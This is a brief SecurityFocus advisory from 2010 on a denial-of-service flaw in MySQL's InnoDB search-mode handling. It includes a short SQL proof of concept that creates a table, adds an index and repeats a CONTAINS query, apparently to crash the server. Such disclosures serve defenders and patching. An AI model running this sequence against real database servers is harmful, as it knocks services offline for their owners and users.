MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability

Attackers can use standard database client software to exploit this issue.

The following proof of concept is available:

mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected

mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set

mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');


 

Copyright 2010, SecurityFocus